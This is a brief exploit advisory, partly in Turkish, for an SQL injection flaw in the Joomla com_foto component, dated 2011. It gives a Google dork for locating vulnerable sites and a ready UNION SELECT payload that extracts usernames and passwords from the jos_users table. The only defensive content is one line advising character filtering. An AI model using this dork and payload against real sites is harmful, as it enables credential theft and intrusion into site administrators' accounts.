<------------------- header data start ------------------- > ############################################################# Joomla Component Com_foto SQL Injection Vulnerability ############################################################# # Author : SOLVER ~ Bug Researchers # Date : 18.06.2011 # Name : Joomla com_foto # Bug Type : SQL injection # Infection : Admin Login Bilgileri Alinabilir. # Example Vuln : [+]/index.php?option=com_foto&task=categoria&id_categoria=[EXPLOIT] [+] Dork:inurl:"com_foto" [+] Demo: http://site/index.php?option=com_foto&task=categoria&id_categoria=-4+union+select+1,password,username,4,5,6,7+from+jos_users-- # Bug Fix Advice : Zararli Karakterler Filtrenmelidir. #############################################################